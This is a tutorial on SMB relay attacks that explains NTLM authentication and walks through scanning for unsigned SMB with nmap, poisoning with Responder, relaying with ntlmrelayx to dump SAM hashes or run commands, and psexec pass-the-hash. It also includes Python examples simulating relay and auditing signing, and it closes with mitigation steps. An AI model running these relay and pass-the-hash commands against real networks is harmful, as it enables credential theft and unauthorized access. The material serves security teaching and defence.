
SMB Relay Attacks

When cracking a victim's password hash is impractical, for example because the company enforces a strong password policy such as a 21-character minimum, attackers can use SMB relay attacks to bypass this obstacle and still gain unauthorized access.

What is SMB?

Server Message Block (SMB) is a protocol used for network file sharing that enables devices within the same network to access shared resources like files and printers. It operates on the Application and Presentation Layers and typically uses port 445. SMB requires users to authenticate before accessing resources, and this authentication is often based on the NTLM protocol (usually NTLMv2).

How NTLM Authentication Works

NTLM (NT LAN Manager) is a challenge-response authentication protocol used in Windows. Here's how it works:

  1. When a client requests access to a service, the service sends a random challenge (nonce).

  2. The client encrypts this challenge using its password hash and sends it back.

  3. The service forwards the encrypted challenge and the clear-text challenge to the Domain Controller (DC).

  4. The DC, which stores all user and resource hashes, encrypts the challenge with the user’s hash.

  5. If the encrypted challenge matches the one sent by the client, access is granted.

The Attack Process (SMB Relaying)

The attacker doesn't crack the password. Instead, they just "relay" the challenge and response between the victim and another server. Here's how:

  1. Intercept Connection: The attacker tricks the victim's device into connecting to them instead of the real server. This could be done by:

    • Responding to broadcast requests (e.g., LLMNR poisoning).

    • Spoofing a network resource.

  2. Get the Challenge: The attacker forwards the victim’s login request to a target server. The target server sends its challenge back (just like normal).

  3. Relay the Challenge: The attacker forwards this challenge to the victim. The victim, believing it is from the real server, encrypts it with their password hash and sends the response.

  4. Authenticate as the Victim: The attacker sends the victim’s response to the target server. Since the response matches the challenge, the target server thinks the victim has logged in.

For this attack to work, the following conditions must be met:

  1. Same Network

  2. LLMNR Enabled

  3. SMB Signing Disabled/Not Required

  4. The relayed user has elevated privileges (local administrator) on the target; otherwise the relayed session cannot dump hashes or run commands.
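The two lists above (how NTLM challenge-response works, and how a relay forwards that exchange) and the SMB signing condition can be tied together in a small simulation. The following is an added example, not code from the original notes or from any of the tools they mention: it models a domain controller, a file server, a victim workstation and a relay, using stand-in primitives (SHA-256 in place of MD4 for the NT hash, HMAC-MD5 over the bare challenge in place of the NTLMv2 computation). The names, the password and the request are constructed. It shows that forwarding the challenge and response verbatim does authenticate, and that a server which requires signing still rejects the relayed session because the signing key is derived from the NT hash, which the relay never holds.

```python
import hashlib
import hmac
import os
from typing import Optional

# Constructed model of NTLM challenge-response plus SMB signing (not MS-NLMP).
# Stand-ins: SHA-256 replaces MD4 for the NT hash (MD4 sits in OpenSSL's
# legacy provider) and HMAC-MD5 over the challenge replaces the NTLMv2 HMAC
# over username, domain, challenge and client blob. The property that matters
# is kept: the response proves knowledge of the NT hash, and the signing key
# is derived from that hash, which a relaying attacker never sees.


def nt_hash(password: str) -> bytes:
    """Stand-in for the NT hash the DC stores (real: MD4 of the UTF-16LE password)."""
    return hashlib.sha256(password.encode("utf-16-le")).digest()


def challenge_response(secret: bytes, challenge: bytes) -> bytes:
    """Client proof: keyed hash of the server's challenge under the NT hash."""
    return hmac.new(secret, challenge, hashlib.md5).digest()


def signing_key(secret: bytes, response: bytes) -> bytes:
    """Session key for SMB signing; deriving it needs the NT hash itself."""
    return hmac.new(secret, response, hashlib.md5).digest()


def sign(key: bytes, message: bytes) -> bytes:
    return hmac.new(key, message, hashlib.md5).digest()


class DomainController:
    """Stores NT hashes and validates a challenge/response pair for a server."""

    def __init__(self, users: dict):
        self.hashes = {user: nt_hash(pw) for user, pw in users.items()}

    def validate(self, user: str, challenge: bytes, response: bytes) -> Optional[bytes]:
        expected = challenge_response(self.hashes[user], challenge)
        if not hmac.compare_digest(expected, response):
            return None
        return signing_key(self.hashes[user], response)  # handed back to the server


class FileServer:
    """SMB server; require_signing mirrors 'Digitally sign communications (always)'."""

    def __init__(self, dc: DomainController, require_signing: bool):
        self.dc = dc
        self.require_signing = require_signing
        self.sessions = {}  # session id -> signing key

    def new_challenge(self) -> bytes:
        return os.urandom(8)

    def authenticate(self, user: str, challenge: bytes, response: bytes) -> Optional[str]:
        key = self.dc.validate(user, challenge, response)
        if key is None:
            return None
        sid = os.urandom(4).hex()
        self.sessions[sid] = key
        return sid

    def handle(self, sid: Optional[str], message: bytes, signature: Optional[bytes]) -> bool:
        """Serve a request on an authenticated session; when signing is required
        the signature must verify under that session's key."""
        if sid not in self.sessions:
            return False
        if not self.require_signing:
            return True  # unsigned traffic is accepted: this is the relay-exposed state
        if signature is None:
            return False
        return hmac.compare_digest(sign(self.sessions[sid], message), signature)


class Workstation:
    """Victim client: answers whatever challenge it is handed with its own hash."""

    def __init__(self, password: str):
        self.secret = nt_hash(password)

    def answer(self, challenge: bytes) -> bytes:
        return challenge_response(self.secret, challenge)

    def key_for(self, response: bytes) -> bytes:
        return signing_key(self.secret, response)


PASSWORD = "correct horse battery staple!"  # constructed; length is irrelevant to a relay
REQUEST = b"READ finance/payroll.xlsx"      # constructed request on the relayed session


def relay_scenario(require_signing: bool) -> dict:
    """Challenge and response are forwarded verbatim, so authentication succeeds;
    whether the relay can then use the session depends only on signing."""
    server = FileServer(DomainController({"alice": PASSWORD}), require_signing)
    victim = Workstation(PASSWORD)
    challenge = server.new_challenge()       # fetched from the real server
    response = victim.answer(challenge)      # victim answers the forwarded challenge
    sid = server.authenticate("alice", challenge, response)
    accepted = server.handle(sid, REQUEST, None)  # no NT hash, so no session key to sign with
    return {"auth_ok": sid is not None, "request_accepted": accepted}


def legitimate_scenario(require_signing: bool) -> bool:
    """A real client holds the hash, derives the same key as the DC, and signs."""
    server = FileServer(DomainController({"alice": PASSWORD}), require_signing)
    client = Workstation(PASSWORD)
    challenge = server.new_challenge()
    response = client.answer(challenge)
    sid = server.authenticate("alice", challenge, response)
    return server.handle(sid, REQUEST, sign(client.key_for(response), REQUEST))


if __name__ == "__main__":
    for required in (False, True):
        print("signing required:", required, relay_scenario(required))
```

Running it prints that the relayed authentication succeeds in both cases, but the follow-up request is only served when signing is optional; that is exactly the gap the "enabled but not required" nmap result describes.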

Exploiting SMB (AKA SMB Relay Attacks)

Step 1: The Attacker Identifies Workstations without SMB Signing Enforced

nmap --script=smb2-security-mode.nse -p445 10.10.10.0/24

The result to look for in the script output is: "Message signing enabled but not required."

Message signing adds a digital signature to every SMB message so that tampering is detected and the sender is verified. When signing is not required, an attacker can relay authentication. By default, Windows enables signing but does not require it, which leaves such systems exposed.

Step 2: The Attacker Sets Up Their Attack

First, configure Responder so that it does not answer SMB and HTTP requests itself (in Responder.conf set SMB = Off and HTTP = Off); those connections are then left for ntlmrelayx to relay.

sudo nano /etc/responder/Responder.conf

Next, launch Responder.

sudo responder -I eth0 -dwP

Finally, launch ntlmrelayx and wait for an event to occur.

sudo ntlmrelayx.py -tf targets.txt -smb2support

Step 3: An Event Occurs and Credentials Get Relayed

Behind the scenes, an event (such as LLMNR poisoning) has occurred. Responder poisons the name lookup, the victim's authentication attempt lands on ntlmrelayx, and ntlmrelayx relays the credentials to the hosts listed in the targets file.

Below is what a successful relay looks like.

As you can see here, the local SAM hashes (the password hashes from the victim machine) are dumped to the terminal. You can either crack these hashes offline or, more effectively, use pass-the-hash attacks to gain access to the victim machine without needing to know the actual password.

The beauty of relay attacks is that you never need to know the password to pull off the attack. So much for a good password policy!

Gain Shell Access or Run Commands

While gaining a shell on the target is not always necessary for a successful SMB relay attack, it can be a valuable option to have in certain scenarios, especially when further manual actions are required in the target environment.

With ntlmrelayx, you can also attempt to gain shell access or run arbitrary commands on the victim machine.

sudo ntlmrelayx.py -tf targets.txt -smb2support -i

The -i flag opens an interactive SMB client bound to localhost for each successful relay (the first one on port 11000). Connect to it from a second terminal:

nc 127.0.0.1 11000

We can also run commands remotely. To run a command (e.g., whoami) on the victim machine during the attack:

sudo ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

While tools like Metasploit can be used for post-exploitation tasks, they are sometimes detected by security systems. An effective alternative is Impacket's psexec.py, which can authenticate with the victim's hash (pass-the-hash) to execute commands. For example:

psexec.py administrator@10.0.0.25 -hashes <LM hash>:<NT hash>

There are also a few other tools, such as wmiexec.py and smbexec.py; which one is appropriate depends on the target's environment and security measures.

How Can SMB Relay Attacks Be Mitigated?

Main Defense: Enable SMB Signing

  • Pros: Completely stops SMB relay attacks.

  • Cons: May cause performance issues, especially with SMBv1 and legacy devices.

To configure Active Directory to enforce SMB signing, enable the following policies in Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options:

  • Client-side:

    • Microsoft network client: Digitally sign communications (always)

    • Microsoft network client: Digitally sign communications (if server agrees)

  • Server-side:

    • Microsoft network server: Digitally sign communications (always)

    • Microsoft network server: Digitally sign communications (if client agrees)

Confirming the Mitigation

Run this command to verify SMB signing is enabled:

reg query HKLM\System\CurrentControlSet\Services\LanManServer\Parameters | findstr /I securitysignature

If the result shows '0x1', SMB signing is active. The query returns two values: EnableSecuritySignature corresponds to the "(if client agrees)" policy and RequireSecuritySignature to the "(always)" policy, so the relay-exposed state is fixed only when RequireSecuritySignature shows 0x1.
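When the check above is run across many hosts, the two DWORDs are easy to misread. The following is an added example, not part of the original notes: a small Python parser for the `reg query ... | findstr /I securitysignature` output that maps the values to the same wording nmap's smb2-security-mode script uses and lists the hosts that still accept unsigned sessions. The sample outputs and hostnames are constructed. It also encodes one caveat a practitioner should know: Windows ignores EnableSecuritySignature for SMB2 and later, so on current systems only RequireSecuritySignature decides whether a relay is possible.

```python
import re

# Added example (not from the original page): classify SMB server signing
# posture from 'reg query HKLM\...\LanManServer\Parameters | findstr /I
# securitysignature' output, for one host or a batch. Samples are constructed.

VALUE_RE = re.compile(
    r"^\s*(EnableSecuritySignature|RequireSecuritySignature)\s+REG_DWORD\s+0x([0-9A-Fa-f]+)",
    re.IGNORECASE,
)


def parse_signing_values(reg_output: str) -> dict:
    """Return {'EnableSecuritySignature': int, 'RequireSecuritySignature': int}
    for whichever of the two values appear in the reg query output."""
    values = {}
    for line in reg_output.splitlines():
        match = VALUE_RE.match(line)
        if not match:
            continue
        name = match.group(1).lower()
        canonical = "RequireSecuritySignature" if name.startswith("require") else "EnableSecuritySignature"
        values[canonical] = int(match.group(2), 16)  # reg query prints DWORDs as hex
    return values


def signing_posture(values: dict) -> str:
    """'required' is the '(always)' policy and the only state that stops a relay.
    EnableSecuritySignature is ignored by Windows for SMB2/SMB3 (it only affects
    SMB1), so 'enabled but not required' is still relay-exposed."""
    if values.get("RequireSecuritySignature") == 1:
        return "required"
    if values.get("EnableSecuritySignature") == 1:
        return "enabled but not required"
    return "disabled"


def audit(outputs: dict) -> list:
    """hostname -> reg query output; returns hosts where signing is not required."""
    return sorted(
        host for host, out in outputs.items()
        if signing_posture(parse_signing_values(out)) != "required"
    )


SAMPLE_OUTPUTS = {  # constructed; hostnames are placeholders
    "ws01.example.local": (
        "    EnableSecuritySignature    REG_DWORD    0x1\r\n"
        "    RequireSecuritySignature    REG_DWORD    0x0\r\n"
    ),
    "dc01.example.local": (
        "    EnableSecuritySignature    REG_DWORD    0x1\r\n"
        "    RequireSecuritySignature    REG_DWORD    0x1\r\n"
    ),
    "legacy02.example.local": (
        "    EnableSecuritySignature    REG_DWORD    0x0\r\n"
        "    RequireSecuritySignature    REG_DWORD    0x0\r\n"
    ),
}


if __name__ == "__main__":
    for host, out in SAMPLE_OUTPUTS.items():
        print(host, signing_posture(parse_signing_values(out)))
    print("not enforcing signing:", audit(SAMPLE_OUTPUTS))
```

Feeding it the real output collected from each host (for example via the same reg query run remotely) gives a quick list of machines that still need the "Digitally sign communications (always)" policy applied.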

Alternate Defenses

  • Account tiering: Separate admin accounts (e.g., “bob” and “bob-da”) to limit access based on task needs.

  • Local admin restrictions: Limit local admin access to reduce the effectiveness of relay attacks.
